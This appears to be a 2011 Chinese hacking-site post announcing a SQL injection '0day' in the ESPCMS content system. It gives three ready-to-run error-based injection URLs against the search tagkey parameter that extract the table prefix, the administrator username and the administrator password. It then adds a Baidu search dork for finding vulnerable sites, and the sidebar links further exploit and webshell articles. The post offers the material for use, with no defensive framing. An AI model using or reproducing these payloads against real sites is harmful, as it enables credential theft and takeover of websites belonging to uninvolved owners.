会员投稿
投稿指南espcms最新注入0day
日期:2011-11-30
点击:114
来源: 未知
上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。
爆表前缀:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 |
暴管理员用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 |
暴管理员密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 |
百度关键字:
inurl:index.php?ac=article&at=read&did= |
Tags:
相关文章列表:
推荐内容
最新文章
- linux下nmap的使用-linux网络扫描技术
- dedecms 5.5 0day 转载
- PHP推荐禁用函数disable_functions PHP安全配置
- Aspcms 1.5 COOKIES注入0day
- (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置
- espcms最新注入0day
- emseasy最新注入漏洞
- 史上最全的各个脚本的一句话木马
- Linux 递归经典:fork 炸弹
- phpcms 2008最新0day加批量EXP代码 2011年11月
- SiteServer 3.4.4最新SQL注入0day
- ECSHOP 2.7.2最新盲注漏洞
- C语言之父丹尼斯·里奇也登船了
- 微软WP7手机系统摄像头非法跟踪用户坐标
- 黑客称德国绿坝时时监控网络用户
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史